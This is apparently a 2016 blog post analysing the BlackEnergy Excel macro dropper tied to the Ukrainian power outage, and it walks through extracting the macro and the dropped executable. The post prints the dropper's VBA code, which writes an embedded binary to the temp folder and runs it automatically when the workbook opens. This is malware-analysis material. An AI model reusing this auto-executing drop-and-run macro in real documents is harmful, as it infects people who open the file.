Thursday, January 7, 2016

Analysis of BlackEnergy MS Office XLS Dropper

In the last few days there were a lot of news (2) regarding a malware which produced some blackout in Ukrainian.

It is not clear yet the full intrusion chain and how the malware was related to the blackout.

(See RobertMLee twitter https://twitter.com/RobertMLee/status/685030648587812864  https://twitter.com/RobertMLee/status/685031160901074944)

However, it looks like there was an MS Office XLS document involved or it was somehow related. 
I got a sample of the file, and In order to perform the analysis, I followed up similar approach to this post I did some days ago:

Using Remnux v6, check the content of the file with oletools:







I dump the macro to a temporal file:







There are several encoded subroutines, but the important part for me, in order to get the EXE is the final part of the code. I can see a executable file is created and then this file is executed through the instruction 'shell'

..
Private Sub MacroExpl()
    Dim fnum As Integer
    Dim fname As String
    Dim i As Integer
    Dim j As Integer
    Dim aa As Byte
    Init0
    Init1
    Init2
    Init3
    Init4
    Init5
    Init6
    Init7
    Init8
    Init9
    Init10
    Init11
    Init12
    Init13
    Init14
    Init15
    Init16
    Init17
    Init18
    Init19
    Init20
    Init21
    Init22
    Init23
    Init24
    Init25
    fnum = FreeFile
    fname = Environ("TMP") & "\vba_macro.exe"
    Open fname For Binary As #fnum
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    Dim rss
    rss = Shell(fname, 1)
End Sub

Private Sub Workbook_Activate()
    MacroExpl

End Sub



Next step is to dump the exe file. For that I will try first to open the original malicious XLS with the MS office debugger in order to put a breakpoint in that function, before it is executed. 




However, the macro is password protected:



But as I have the macro already dumped in Remnux, I can create my own XLS document and import that Macro. So I do that:




Now I setup the breakpoint in the 'Shell' command and I can see where the executable file is stored before it is executed






With this I have the executable :)
In future posts I will explain a bit the approach to analyse the EXE file.